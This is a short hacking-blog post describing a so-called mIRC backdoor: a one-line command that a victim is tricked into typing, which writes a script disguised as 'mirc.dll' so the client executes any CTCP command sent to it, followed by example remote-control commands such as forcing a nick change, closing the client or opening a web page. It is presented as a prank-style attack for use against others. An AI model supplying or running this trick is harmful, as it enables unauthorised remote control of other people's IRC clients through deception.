Well it?s not really a backdoor? but we can consider it one?

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC? all this backdoor stuff was really nothing more than a mIRC script that by it?s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command? such as ping, version, time, etc?. so here is the command that the victim has to enter:

/.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

 

The command is splited in 2 parts, delimited by | (a vertical line)? So the first section writes a file ?mirc.dll? in which we write a simple mIRC script which listens to any CTCP request? the second one loads the file with the mIRC script?.

After the ?victim? executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

 

/ctcp victims_nick /.any_valid_irc_command

So happy ?masterminding??.

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php